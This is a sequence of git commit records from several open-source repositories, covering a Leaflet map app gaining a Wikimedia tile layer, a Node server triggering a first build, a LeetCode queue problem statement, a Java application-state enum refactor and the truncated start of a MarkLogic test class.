= { 'CARTO Voyager' : cartoLayer, 'Wikimedia Maps' : wikiLayer, 'OpenStreetMap Carto' : osmLayer, }; L.control.layers(baseMaps, null, {position: 'topleft'}).addTo(Map); // Add powered by Wikidata map control let powered = L.control({ position: 'bottomleft' }); powered.onAdd = function(Map) { var divElem = L.DomUtil.create('div', 'powered'); divElem.innerHTML = '<a href="https://www.wikidata.org/"><img src="img/powered_by_wikidata.png"></a>'; return divElem; }; powered.addTo(Map); // Initialize the map marker cluster Cluster = new L.markerClusterGroup({ maxClusterRadius: function(z) { if (z <= 15) return 50; if (z === 16) return 40; if (z === 17) return 30; if (z === 18) return 20; if (z >= 19) return 10; }, }).addTo(Map); } // Given a SPARQL query string, a per-result processing callback, and an optional // post-processing callback, queries WDQS using the given query, parses the query // results and calls the per-result callback on each result, calls the // post-processing callback after all results have been processed, then returns // a promise that resolves after all the processing or rejects with an HTTP // error code if there is an error querying WDQS. If SparqlValuesClause is not false, // this also updates the given query with the SparqlValuesClause value prior to // querying WDQS. function queryWdqsThenProcess(query, processEachResult, postprocessCallback) { let promise = new Promise((resolve, reject) => { let xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState !== xhr.DONE) return; if (xhr.status === 200) { resolve(JSON.parse(xhr.responseText)); } else { reject(xhr.status); } }; xhr.open('POST', WDQS_API_URL, true); xhr.overrideMimeType('text/plain'); xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); if (SparqlValuesClause) query = query.replace('<SPARQLVALUESCLAUSE>', SparqlValuesClause); xhr.send('format=json&query=' + encodeURIComponent(query)); }); promise = promise.then(data => { data.results.bindings.forEach(processEachResult); }); if (postprocessCallback) promise = promise.then(postprocessCallback); return promise; } // Enables the app. Should be called after the Wikidata queries have been processed. function enableApp() { PrimaryDataIsLoaded = true; processHashChange(); } // Event handler that handles any change in the window URL hash. When all the // data is loaded, this updates the correct panel section and window title and // optionally updates the map to the relevant location. Otherwise, the panel // contents will show a loading indicator and the window will be the basic title. // This is also called when data has been progressively loaded in order // to update the panel during app initialization. function processHashChange() { let fragment = window.location.hash.replace('#', ''); if (fragment === 'about') { document.title = 'About – ' + BASE_TITLE; displayPanelContent('about'); } else { if (!BootstrapDataIsLoaded) { displayPanelContent('loading'); } else { if (fragment === '' || !(fragment in Records)) { window.location.hash = ''; // Disable invalid fragments document.title = BASE_TITLE; displayPanelContent('index'); } else { activateMapMarker(fragment); displayRecordDetails(fragment); } } } } // Given a record QID, if the record has a map marker, updates the map to show // and center on the map marker and open its popup if needed. function activateMapMarker(qid) { let record = Records[qid]; if (!record.mapMarker) return; // Some records (grouped heritage sites) don't have markers Cluster.zoomToShowLayer( record.mapMarker, function() { Map.setView([record.lat, record.lon], Map.getZoom()); if (!record.popup.isOpen()) record.mapMarker.openPopup(); }, ); } // Given the ID of the panel content ID, displays the corresponding // panel content and updates the navigation menu state as well. function displayPanelContent(id) { document.querySelectorAll('.panel-content').forEach(content => { content.style.display = (content.id === id) ? content.dataset.display : 'none'; }); document.querySelectorAll('nav li').forEach(li => { if (li.childNodes[0].getAttribute('href') === '#' + id) { li.classList.add('selected'); } else { li.classList.remove('selected'); } }); } // Given a record QID, displays the record's details on the side panel, // generating it as needed. Also updates the window title and URL hash. // If the primary data is not yet loaded, shows the loading panel. function displayRecordDetails(qid) { let record = Records[qid]; window.location.hash = `#${qid}`; document.title = `${record.indexTitle} – ${BASE_TITLE}` if (PrimaryDataIsLoaded) { if (!record.panelElem) generateRecordDetails(qid); let detailsElem = document.getElementById('details'); detailsElem.replaceChild(record.panelElem, detailsElem.childNodes[0]); displayPanelContent('details'); } else { displayPanelContent('loading'); } } // Given a Commons image filename and an array of class names, generates // a figure HTML string, returns it, and calls the Commons API to fetch // and insert the image attribution if needed. If the filename is false, // the figure element will indicate "No photo available". function generateFigure(filename, classNames = []) { if (filename) { // Fetch the image attribution asynchronously then add it to the figure element loadJsonp( COMMONS_API_URL, { action : 'query', format : 'json', prop : 'imageinfo', iiprop : 'extmetadata', titles : 'File:' + filename, }, function(data) { let pageId = Object.keys(data.query.pages)[0]; let metadata = data.query.pages[pageId].imageinfo[0].extmetadata; let artistHtml = metadata.Artist.value; if (artistHtml.search('href="//') >= 0) { artistHtml = artistHtml.replace(/href="(?:https?:)?\/\//, 'href="https://'); } let licenseHtml = ''; if ('AttributionRequired' in metadata && metadata.AttributionRequired.value === 'true') { licenseHtml = metadata.LicenseShortName.value.replace(/ /g, '&nbsp;'); licenseHtml = licenseHtml.replace(/-/g, '&#8209;'); licenseHtml = `[${licenseHtml}]`; if ('LicenseUrl' in metadata) { licenseHtml = `<a href="${metadata.LicenseUrl.value}">${licenseHtml}</a>`; } licenseHtml = ' ' + licenseHtml; } let selector = `figure${classNames.length ? '.' : ''}${classNames.join('.')} figcaption`; document.querySelector(selector).innerHTML = artistHtml + licenseHtml; } ); return ( `<figure class="${classNames.join(' ')}">` + `<a href="${COMMONS_WIKI_URL_PREF}File:${filename}">` + `<img class="loading" src="${COMMONS_WIKI_URL_PREF}Special:FilePath/${filename}?width=300" alt="" onload="this.className=''">` + '</a>' + '<figcaption>(Loading…)</figcaption>' + '</figure>' ); } else { return `<figure class="${classNames.join(' ')} nodata">No photo available</figure>`; } } // Given a WDQS query result image data, returns the base image filename. function extractImageFilename(image) { let regex = /https?:\/\/commons\.wikimedia\.org\/wiki\/Special:FilePath\//; return decodeURIComponent(image.value.replace(regex, '')); } // Given a WDQS result record and key name, takes the date value based on // the key name and then returns a formatted date string. function parseDate(result, keyName) { let dateVal = result[keyName].value; if (result[keyName + 'Precision'].value === YEAR_PRECISION) { return dateVal.substr(0, 4); } else { let date = new Date(dateVal); return date.toLocaleDateString( 'en-US', { month : 'long', day : 'numeric', year : 'numeric', }, ); } }
js/eph-common.js
'use strict'; // Constants and fixed parameters const WDQS_API_URL = 'https://query.wikidata.org/sparql'; const COMMONS_WIKI_URL_PREF = 'https://commons.wikimedia.org/wiki/'; const COMMONS_API_URL = 'https://commons.wikimedia.org/w/api.php'; const YEAR_PRECISION = '9'; const PH_QID = 'Q928'; const REGION_QID = 'Q24698'; const PROVINCE_QID = 'Q24746'; const HUC_QID = 'Q29946056'; const CITY_QID = 'Q104157'; const ADMIN_QIDS = [REGION_QID, PROVINCE_QID, HUC_QID, CITY_QID]; const ADMIN_LEVELS = 4; const OSM_LAYER_URL = 'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png'; const OSM_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a>'; const CARTO_LAYER_URL = 'https://cartodb-basemaps-{s}.global.ssl.fastly.net/rastertiles/voyager_labels_under/{z}/{x}/{y}{r}.png'; const CARTO_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a> (data), <a href="https://carto.com/">CARTO</a> (style)'; const TILE_LAYER_MAX_ZOOM = 19; const MIN_PH_LAT = 4.5; const MAX_PH_LAT = 21.0; const MIN_PH_LON = 116.5; const MAX_PH_LON = 126.5; // Globals var Records = {}; // Main app database, keyed by QID var SparqlValuesClause; // SPARQL "VALUES" clause containing the QIDs of all main Wikidata items var Map; // Leaflet map object var Cluster; // Leaflet map cluster var BootstrapDataIsLoaded = false; // Whether the data needed to populate the map and index is loaded var PrimaryDataIsLoaded = false; // Whether the non-lazy data is loaded // ------------------------------------------------------------ window.addEventListener('load', init); // Initializes the app once the page has been loaded. function init() { initMap(); loadPrimaryData(); window.addEventListener('hashchange', processHashChange); Map.on('popupopen', function(e) { displayRecordDetails(e.popup._qid) }); } // Initializes the Leaflet-based map. function initMap() { // Create map and set initial view Map = new L.map('map'); Map.fitBounds([[MAX_PH_LAT, MAX_PH_LON], [MIN_PH_LAT, MIN_PH_LON]]); // Add tile layers let osmLayer = new L.tileLayer(OSM_LAYER_URL, { attribution : OSM_LAYER_ATTRIBUTION, maxZoom : TILE_LAYER_MAX_ZOOM, }) let cartoLayer = new L.tileLayer(CARTO_LAYER_URL, { attribution : CARTO_LAYER_ATTRIBUTION, maxZoom : TILE_LAYER_MAX_ZOOM, }).addTo(Map); let baseMaps = { 'CARTO Voyager' : cartoLayer, 'OpenStreetMap Carto' : osmLayer, }; L.control.layers(baseMaps, null, {position: 'topleft'}).addTo(Map); // Add powered by Wikidata map control let powered = L.control({ position: 'bottomleft' }); powered.onAdd = function(Map) { var divElem = L.DomUtil.create('div', 'powered'); divElem.innerHTML = '<a href="https://www.wikidata.org/"><img src="img/powered_by_wikidata.png"></a>'; return divElem; }; powered.addTo(Map); // Initialize the map marker cluster Cluster = new L.markerClusterGroup({ maxClusterRadius: function(z) { if (z <= 15) return 50; if (z === 16) return 40; if (z === 17) return 30; if (z === 18) return 20; if (z >= 19) return 10; }, }).addTo(Map); } // Given a SPARQL query string, a per-result processing callback, and an optional // post-processing callback, queries WDQS using the given query, parses the query // results and calls the per-result callback on each result, calls the // post-processing callback after all results have been processed, then returns // a promise that resolves after all the processing or rejects with an HTTP // error code if there is an error querying WDQS. If SparqlValuesClause is not false, // this also updates the given query with the SparqlValuesClause value prior to // querying WDQS. function queryWdqsThenProcess(query, processEachResult, postprocessCallback) { let promise = new Promise((resolve, reject) => { let xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (xhr.readyState !== xhr.DONE) return; if (xhr.status === 200) { resolve(JSON.parse(xhr.responseText)); } else { reject(xhr.status); } }; xhr.open('POST', WDQS_API_URL, true); xhr.overrideMimeType('text/plain'); xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); if (SparqlValuesClause) query = query.replace('<SPARQLVALUESCLAUSE>', SparqlValuesClause); xhr.send('format=json&query=' + encodeURIComponent(query)); }); promise = promise.then(data => { data.results.bindings.forEach(processEachResult); }); if (postprocessCallback) promise = promise.then(postprocessCallback); return promise; } // Enables the app. Should be called after the Wikidata queries have been processed. function enableApp() { PrimaryDataIsLoaded = true; processHashChange(); } // Event handler that handles any change in the window URL hash. When all the // data is loaded, this updates the correct panel section and window title and // optionally updates the map to the relevant location. Otherwise, the panel // contents will show a loading indicator and the window will be the basic title. // This is also called when data has been progressively loaded in order // to update the panel during app initialization. function processHashChange() { let fragment = window.location.hash.replace('#', ''); if (fragment === 'about') { document.title = 'About – ' + BASE_TITLE; displayPanelContent('about'); } else { if (!BootstrapDataIsLoaded) { displayPanelContent('loading'); } else { if (fragment === '' || !(fragment in Records)) { window.location.hash = ''; // Disable invalid fragments document.title = BASE_TITLE; displayPanelContent('index'); } else { activateMapMarker(fragment); displayRecordDetails(fragment); } } } } // Given a record QID, if the record has a map marker, updates the map to show // and center on the map marker and open its popup if needed. function activateMapMarker(qid) { let record = Records[qid]; if (!record.mapMarker) return; // Some records (grouped heritage sites) don't have markers Cluster.zoomToShowLayer( record.mapMarker, function() { Map.setView([record.lat, record.lon], Map.getZoom()); if (!record.popup.isOpen()) record.mapMarker.openPopup(); }, ); } // Given the ID of the panel content ID, displays the corresponding // panel content and updates the navigation menu state as well. function displayPanelContent(id) { document.querySelectorAll('.panel-content').forEach(content => { content.style.display = (content.id === id) ? content.dataset.display : 'none'; }); document.querySelectorAll('nav li').forEach(li => { if (li.childNodes[0].getAttribute('href') === '#' + id) { li.classList.add('selected'); } else { li.classList.remove('selected'); } }); } // Given a record QID, displays the record's details on the side panel, // generating it as needed. Also updates the window title and URL hash. // If the primary data is not yet loaded, shows the loading panel. function displayRecordDetails(qid) { let record = Records[qid]; window.location.hash = `#${qid}`; document.title = `${record.indexTitle} – ${BASE_TITLE}` if (PrimaryDataIsLoaded) { if (!record.panelElem) generateRecordDetails(qid); let detailsElem = document.getElementById('details'); detailsElem.replaceChild(record.panelElem, detailsElem.childNodes[0]); displayPanelContent('details'); } else { displayPanelContent('loading'); } } // Given a Commons image filename and an array of class names, generates // a figure HTML string, returns it, and calls the Commons API to fetch // and insert the image attribution if needed. If the filename is false, // the figure element will indicate "No photo available". function generateFigure(filename, classNames = []) { if (filename) { // Fetch the image attribution asynchronously then add it to the figure element loadJsonp( COMMONS_API_URL, { action : 'query', format : 'json', prop : 'imageinfo', iiprop : 'extmetadata', titles : 'File:' + filename, }, function(data) { let pageId = Object.keys(data.query.pages)[0]; let metadata = data.query.pages[pageId].imageinfo[0].extmetadata; let artistHtml = metadata.Artist.value; if (artistHtml.search('href="//') >= 0) { artistHtml = artistHtml.replace(/href="(?:https?:)?\/\//, 'href="https://'); } let licenseHtml = ''; if ('AttributionRequired' in metadata && metadata.AttributionRequired.value === 'true') { licenseHtml = metadata.LicenseShortName.value.replace(/ /g, '&nbsp;'); licenseHtml = licenseHtml.replace(/-/g, '&#8209;'); licenseHtml = `[${licenseHtml}]`; if ('LicenseUrl' in metadata) { licenseHtml = `<a href="${metadata.LicenseUrl.value}">${licenseHtml}</a>`; } licenseHtml = ' ' + licenseHtml; } document.querySelector(`figure.${classNames.join('.')} figcaption`).innerHTML = artistHtml + licenseHtml; } ); return ( `<figure class="${classNames.join(' ')}">` + `<a href="${COMMONS_WIKI_URL_PREF}File:${filename}">` + `<img class="loading" src="${COMMONS_WIKI_URL_PREF}Special:FilePath/${filename}?width=300" alt="" onload="this.className=''">` + '</a>' + '<figcaption>(Loading…)</figcaption>' + '</figure>' ); } else { return `<figure class="${classNames.join(' ')} nodata">No photo available</figure>`; } } // Given a WDQS query result image data, returns the base image filename. function extractImageFilename(image) { let regex = /https?:\/\/commons\.wikimedia\.org\/wiki\/Special:FilePath\//; return decodeURIComponent(image.value.replace(regex, '')); } // Given a WDQS result record and key name, takes the date value based on // the key name and then returns a formatted date string. function parseDate(result, keyName) { let dateVal = result[keyName].value; if (result[keyName + 'Precision'].value === YEAR_PRECISION) { return dateVal.substr(0, 4); } else { let date = new Date(dateVal); return date.toLocaleDateString( 'en-US', { month : 'long', day : 'numeric', year : 'numeric', }, ); } }
Add Wikimedia Maps tile layer; port bugfix from Heritage Sites Map
js/eph-common.js
Add Wikimedia Maps tile layer; port bugfix from Heritage Sites Map
<ide><path>s/eph-common.js <ide> const OSM_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a>'; <ide> const CARTO_LAYER_URL = 'https://cartodb-basemaps-{s}.global.ssl.fastly.net/rastertiles/voyager_labels_under/{z}/{x}/{y}{r}.png'; <ide> const CARTO_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a> (data), <a href="https://carto.com/">CARTO</a> (style)'; <add>const WIKI_LAYER_URL = 'https://maps.wikimedia.org/osm-intl/{z}/{x}/{y}{r}.png'; <add>const WIKI_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a> (data), <a href="https://carto.com/">Wikimedia Foundation</a> (style)'; <ide> const TILE_LAYER_MAX_ZOOM = 19; <ide> const MIN_PH_LAT = 4.5; <ide> const MAX_PH_LAT = 21.0; <ide> Map.fitBounds([[MAX_PH_LAT, MAX_PH_LON], [MIN_PH_LAT, MIN_PH_LON]]); <ide> <ide> // Add tile layers <del> let osmLayer = new L.tileLayer(OSM_LAYER_URL, { <del> attribution : OSM_LAYER_ATTRIBUTION, <del> maxZoom : TILE_LAYER_MAX_ZOOM, <del> }) <ide> let cartoLayer = new L.tileLayer(CARTO_LAYER_URL, { <ide> attribution : CARTO_LAYER_ATTRIBUTION, <ide> maxZoom : TILE_LAYER_MAX_ZOOM, <ide> }).addTo(Map); <add> let wikiLayer = new L.tileLayer(WIKI_LAYER_URL, { <add> attribution : WIKI_LAYER_ATTRIBUTION, <add> maxZoom : TILE_LAYER_MAX_ZOOM, <add> }); <add> let osmLayer = new L.tileLayer(OSM_LAYER_URL, { <add> attribution : OSM_LAYER_ATTRIBUTION, <add> maxZoom : TILE_LAYER_MAX_ZOOM, <add> }); <ide> let baseMaps = { <ide> 'CARTO Voyager' : cartoLayer, <add> 'Wikimedia Maps' : wikiLayer, <ide> 'OpenStreetMap Carto' : osmLayer, <ide> }; <ide> L.control.layers(baseMaps, null, {position: 'topleft'}).addTo(Map); <ide> } <ide> licenseHtml = ' ' + licenseHtml; <ide> } <del> document.querySelector(`figure.${classNames.join('.')} figcaption`).innerHTML = artistHtml + licenseHtml; <add> let selector = `figure${classNames.length ? '.' : ''}${classNames.join('.')} figcaption`; <add> document.querySelector(selector).innerHTML = artistHtml + licenseHtml; <ide> } <ide> ); <ide>
JavaScript
mit
87df87657ae22a0ba5ca7b13fb23ccf93929c17a
0
gessojs/gessojs,gessojs/gessojs
var path = require('path'); var nunjucks = require('nunjucks'); var express = require('express'); var build = require('./build'); var settings = require('./settings'); function createApp(watcher) { // Express application var app = express(); // Attach watcher app.watcher = watcher || null; // Middleware app.use(express.static(path.join(__dirname, 'public'))); // Configure extensions nunjucks.configure(path.join(__dirname, 'views')); // Routes app.get('/', function(req, res) { watcher.whenReady(function() { var canvasClass = settings.CANVAS_CLASS; var canvasWidth = settings.CANVAS_WIDTH; var canvasHeight = settings.CANVAS_HEIGHT; // TODO: Get values from project settings res.end(nunjucks.render('index.html', { canvasClass: canvasClass, canvasWidth: canvasWidth, canvasHeight: canvasHeight })); }); }); return app; } function serve(packagePath) { // TODO: Resolve root path if (!packagePath) { packagePath = process.cwd(); } // Create the watcher var watcher = build.watch(packagePath); // Create the app var app = createApp(watcher); // Run the server app.listen(settings.PORT, settings.HOST, function() { console.log(' * Listening on http://%s:%d/', settings.HOST, settings.PORT); // Start first build watcher.rebuild(); }); return app; } module.exports = { createApp: createApp, serve: serve };
gesso/server.js
var path = require('path'); var nunjucks = require('nunjucks'); var express = require('express'); var build = require('./build'); var settings = require('./settings'); function createApp(watcher) { // Express application var app = express(); // Attach watcher app.watcher = watcher || null; // Middleware app.use(express.static(path.join(__dirname, 'public'))); // Configure extensions nunjucks.configure(path.join(__dirname, 'views')); // Routes app.get('/', function(req, res) { watcher.whenReady(function() { var canvasClass = settings.CANVAS_CLASS; var canvasWidth = settings.CANVAS_WIDTH; var canvasHeight = settings.CANVAS_HEIGHT; // TODO: Get values from project settings res.end(nunjucks.render('index.html', { canvasClass: canvasClass, canvasWidth: canvasWidth, canvasHeight: canvasHeight })); }); }); return app; } function serve(packagePath) { // TODO: Resolve root path if (!packagePath) { packagePath = process.cwd(); } // Create the watcher var watcher = build.watch(packagePath); // Create the app var app = createApp(watcher); // Run the server app.listen(settings.PORT, settings.HOST, function() { console.log(' * Listening on http://%s:%d/', settings.HOST, settings.PORT); }); return app; } module.exports = { createApp: createApp, serve: serve };
Run build when first serving.
gesso/server.js
Run build when first serving.
<ide><path>esso/server.js <ide> // Run the server <ide> app.listen(settings.PORT, settings.HOST, function() { <ide> console.log(' * Listening on http://%s:%d/', settings.HOST, settings.PORT); <add> // Start first build <add> watcher.rebuild(); <ide> }); <ide> <ide> return app;
Java
mit
error: pathspec 'leetcode/java/prob232ImplementQueueUsing2Stacks/MyQueue.java' did not match any file(s) known to git
8032c0173a1c8ef52bc1749e6af4455eaaf00cb3
1
AmadouSallah/Programming-Interview-Questions,AmadouSallah/Programming-Interview-Questions
/* Problem 232: Implement Queue using Stacks mplement the following operations of a queue using stacks. push(x) -- Push element x to the back of queue. pop() -- Removes the element from in front of queue. peek() -- Get the front element. empty() -- Return whether the queue is empty. Notes: You must use only standard operations of a stack -- which means only push to top, peek/pop from top, size, and is empty operations are valid. Depending on your language, stack may not be supported natively. You may simulate a stack by using a list or deque (double-ended queue), as long as you use only standard operations of a stack. You may assume that all operations are valid (for example, no pop or peek operations will be called on an empty queue). */
leetcode/java/prob232ImplementQueueUsing2Stacks/MyQueue.java
Added problem statement to MyQueue.java
leetcode/java/prob232ImplementQueueUsing2Stacks/MyQueue.java
Added problem statement to MyQueue.java
<ide><path>eetcode/java/prob232ImplementQueueUsing2Stacks/MyQueue.java <add>/* <add>Problem 232: Implement Queue using Stacks <add> <add>mplement the following operations of a queue using stacks. <add> <add>push(x) -- Push element x to the back of queue. <add>pop() -- Removes the element from in front of queue. <add>peek() -- Get the front element. <add>empty() -- Return whether the queue is empty. <add> <add>Notes: <add>You must use only standard operations of a stack -- which means only push <add>to top, peek/pop from top, size, and is empty operations are valid. <add>Depending on your language, stack may not be supported natively. You may <add>simulate a stack by using a list or deque (double-ended queue), <add>as long as you use only standard operations of a stack. <add>You may assume that all operations are valid (for example, no pop <add>or peek operations will be called on an empty queue). <add>*/
Java
lgpl-2.1
error: pathspec 'src/org/concord/framework/data/DataDimension.java' did not match any file(s) known to git
b032db776991db463b59b6f0acc2c9160deda218
1
concord-consortium/framework
package org.concord.framework.data; /** * @author dima * */ public interface DataDimension { String getDimension(); void setDimension(String dimension); }
src/org/concord/framework/data/DataDimension.java
*** empty log message *** git-svn-id: fdf63cc6b6871a635be2b727c8623e4c3a9a9ed7@998 6e01202a-0783-4428-890a-84243c50cc2b
src/org/concord/framework/data/DataDimension.java
*** empty log message ***
<ide><path>rc/org/concord/framework/data/DataDimension.java <add>package org.concord.framework.data; <add> <add>/** <add> * @author dima <add> * <add> */ <add>public interface DataDimension { <add> String getDimension(); <add> void setDimension(String dimension); <add>}
Java
mit
ae1a6bcafe165557f9af7903dd976fd37d73a22a
0
InnovateUKGitHub/innovation-funding-service,InnovateUKGitHub/innovation-funding-service,InnovateUKGitHub/innovation-funding-service,InnovateUKGitHub/innovation-funding-service,InnovateUKGitHub/innovation-funding-service
package org.innovateuk.ifs.application.resource; import com.google.common.collect.ImmutableSet; import com.google.common.collect.Sets; import org.innovateuk.ifs.workflow.resource.ProcessState; import org.innovateuk.ifs.workflow.resource.State; import java.util.List; import static org.innovateuk.ifs.util.CollectionFunctions.simpleMap; public enum ApplicationState implements ProcessState { CREATED(State.CREATED, "Created"), // initial state SUBMITTED(State.SUBMITTED, "Submitted"), INELIGIBLE(State.NOT_APPLICABLE, "Ineligible"), INELIGIBLE_INFORMED(State.NOT_APPLICABLE_INFORMED, "Ineligible Informed"), APPROVED(State.ACCEPTED, "Approved"), REJECTED(State.REJECTED, "Rejected"), OPEN(State.OPEN, "Open"), IN_PANEL(State.IN_PANEL, "In Panel"); final State backingState; private String displayName; public static final ImmutableSet<ApplicationState> submittedStates = Sets.immutableEnumSet(ApplicationState.SUBMITTED, ApplicationState.INELIGIBLE, ApplicationState.APPROVED, ApplicationState.REJECTED, ApplicationState.INELIGIBLE_INFORMED); ApplicationState(State backingState, String displayName) { this.backingState = backingState; this.displayName = displayName; } /* ApplicationState(State backingState) { this.backingState = backingState; } */ public String getStateName() { return backingState.name(); } public State getBackingState() { return backingState; } public String getDisplayName() { return displayName; } public static List<State> getBackingStates() { return simpleMap(ApplicationState.values(), ProcessState::getBackingState); } public static ApplicationState fromState(State state) { return ProcessState.fromState(ApplicationState.values(), state); } }
ifs-resources/src/main/java/org/innovateuk/ifs/application/resource/ApplicationState.java
package org.innovateuk.ifs.application.resource; import com.google.common.collect.ImmutableSet; import com.google.common.collect.Sets; import org.innovateuk.ifs.workflow.resource.ProcessState; import org.innovateuk.ifs.workflow.resource.State; import java.util.List; import static org.innovateuk.ifs.util.CollectionFunctions.simpleMap; public enum ApplicationState implements ProcessState { CREATED(State.CREATED), // initial state SUBMITTED(State.SUBMITTED), INELIGIBLE(State.NOT_APPLICABLE), INELIGIBLE_INFORMED(State.NOT_APPLICABLE_INFORMED), APPROVED(State.ACCEPTED), REJECTED(State.REJECTED), OPEN(State.OPEN), IN_PANEL(State.IN_PANEL); final State backingState; public static final ImmutableSet<ApplicationState> submittedStates = Sets.immutableEnumSet(ApplicationState.SUBMITTED, ApplicationState.INELIGIBLE, ApplicationState.APPROVED, ApplicationState.REJECTED, ApplicationState.INELIGIBLE_INFORMED); ApplicationState(State backingState) { this.backingState = backingState; } public String getStateName() { return backingState.name(); } public State getBackingState() { return backingState; } public static List<State> getBackingStates() { return simpleMap(ApplicationState.values(), ProcessState::getBackingState); } public static ApplicationState fromState(State state) { return ProcessState.fromState(ApplicationState.values(), state); } }
IFS-2904-CSS-Search-Application-Number Application State Changes for demo purpose for Andy. Change-Id: I5ba573fb4d507c45dcc8888477eaac661149f004
ifs-resources/src/main/java/org/innovateuk/ifs/application/resource/ApplicationState.java
IFS-2904-CSS-Search-Application-Number
<ide><path>fs-resources/src/main/java/org/innovateuk/ifs/application/resource/ApplicationState.java <ide> import static org.innovateuk.ifs.util.CollectionFunctions.simpleMap; <ide> <ide> public enum ApplicationState implements ProcessState { <del> CREATED(State.CREATED), // initial state <del> SUBMITTED(State.SUBMITTED), <del> INELIGIBLE(State.NOT_APPLICABLE), <del> INELIGIBLE_INFORMED(State.NOT_APPLICABLE_INFORMED), <del> APPROVED(State.ACCEPTED), <del> REJECTED(State.REJECTED), <del> OPEN(State.OPEN), <del> IN_PANEL(State.IN_PANEL); <add> CREATED(State.CREATED, "Created"), // initial state <add> SUBMITTED(State.SUBMITTED, "Submitted"), <add> INELIGIBLE(State.NOT_APPLICABLE, "Ineligible"), <add> INELIGIBLE_INFORMED(State.NOT_APPLICABLE_INFORMED, "Ineligible Informed"), <add> APPROVED(State.ACCEPTED, "Approved"), <add> REJECTED(State.REJECTED, "Rejected"), <add> OPEN(State.OPEN, "Open"), <add> IN_PANEL(State.IN_PANEL, "In Panel"); <add> <ide> final State backingState; <add> private String displayName; <ide> <ide> public static final ImmutableSet<ApplicationState> submittedStates = Sets.immutableEnumSet(ApplicationState.SUBMITTED, <ide> ApplicationState.INELIGIBLE, <ide> ApplicationState.REJECTED, <ide> ApplicationState.INELIGIBLE_INFORMED); <ide> <add> ApplicationState(State backingState, String displayName) { <add> this.backingState = backingState; <add> this.displayName = displayName; <add> } <add> <add>/* <ide> ApplicationState(State backingState) { <ide> this.backingState = backingState; <ide> } <add>*/ <ide> <ide> public String getStateName() { <ide> return backingState.name(); <ide> <ide> public State getBackingState() { <ide> return backingState; <add> } <add> <add> public String getDisplayName() { <add> return displayName; <ide> } <ide> <ide> public static List<State> getBackingStates() {
Java
apache-2.0
c64b6e6e6ad06c8d1832188e652345a4b19db7c2
0
marklogic/java-client-api,marklogic/java-client-api,marklogic/java-client-api,marklogic/java-client-api,marklogic/java-client-api
/* * Copyright 2014-2017 MarkLogic Corporation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.marklogic.client.datamovement.functionaltests; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertNotEquals; import static org.junit.Assert.assertTrue; import static org.junit.Assert.fail; import java.io.BufferedReader; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.FileReader; import java.io.FileWriter; import java.io.IOException; import java.util.ArrayList; import java.util.Calendar; import java.util.List; import java.util.TreeMap; import java.util.concurrent.TimeUnit; import java.util.logging.Handler; import java.util.logging.Level; import java.util.logging.LogRecord; import java.util.logging.Logger; import javax.xml.namespace.QName; import javax.xml.parsers.ParserConfigurationException; import javax.xml.transform.TransformerException; import javax.xml.xpath.XPathExpressionException; import org.apache.logging.log4j.core.jmx.AppenderAdmin; import org.junit.After; import org.junit.AfterClass; import org.junit.Before; import org.junit.BeforeClass; import org.junit.Ignore; import org.junit.Test; import org.w3c.dom.Document; import org.xml.sax.SAXException; import com.fasterxml.jackson.databind.JsonNode; import com.marklogic.client.DatabaseClient; import com.marklogic.client.DatabaseClientFactory; import com.marklogic.client.DatabaseClientFactory.Authentication; import com.marklogic.client.admin.ExtensionMetadata; import com.marklogic.client.admin.QueryOptionsManager; import com.marklogic.client.admin.ServerConfigurationManager; import com.marklogic.client.admin.TransformExtensionsManager; import com.marklogic.client.datamovement.DataMovementManager; import com.marklogic.client.datamovement.Forest; import com.marklogic.client.datamovement.JobTicket; import com.marklogic.client.datamovement.QueryBatcher; import com.marklogic.client.datamovement.UrisToWriterListener; import com.marklogic.client.datamovement.WriteBatcher; import com.marklogic.client.datamovement.functionaltests.util.DmsdkJavaClientREST; import com.marklogic.client.datamovement.impl.QueryBatcherImpl; import com.marklogic.client.document.JSONDocumentManager; import com.marklogic.client.document.ServerTransform; import com.marklogic.client.io.DOMHandle; import com.marklogic.client.io.FileHandle; import com.marklogic.client.io.Format; import com.marklogic.client.io.InputStreamHandle; import com.marklogic.client.io.JacksonHandle; import com.marklogic.client.io.ReaderHandle; import com.marklogic.client.io.StringHandle; import com.marklogic.client.query.QueryManager; import com.marklogic.client.query.RawCombinedQueryDefinition; import com.marklogic.client.query.RawStructuredQueryDefinition; import com.marklogic.client.query.StringQueryDefinition; import com.marklogic.client.query.StructuredQueryBuilder; import com.marklogic.client.query.StructuredQueryBuilder.Operator; import com.marklogic.client.query.StructuredQueryDefinition; /** * @author ageorge * Purpose : Test String Queries * - On multiple documents using Java Client DocumentManager Write method and WriteBatcher. * - On meta-data. * - On non-existent document. Verify error message. * - With invalid string query. Verify error message. * */ public class StringQueryHostBatcherTest extends DmsdkJavaClientREST { private static String dbName = "StringQueryHostBatcherDB"; private static String [] fNames = {"StringQueryHostBatcherDB-1", "StringQueryHostBatcherDB-2", "StringQueryHostBatcherDB-3"}; private static DataMovementManager dmManager = null; private static DataMovementManager moveMgr = null; private static String restServerHost = null; private static String restServerName = null; private static int restServerPort = 0; private static DatabaseClient clientQHB = null; private static DatabaseClient client = null; private static String dataConfigDirPath = null; /** * @throws java.lang.Exception */ @BeforeClass public static void setUpBeforeClass() throws Exception { loadGradleProperties(); restServerPort = getRestAppServerPort(); restServerHost 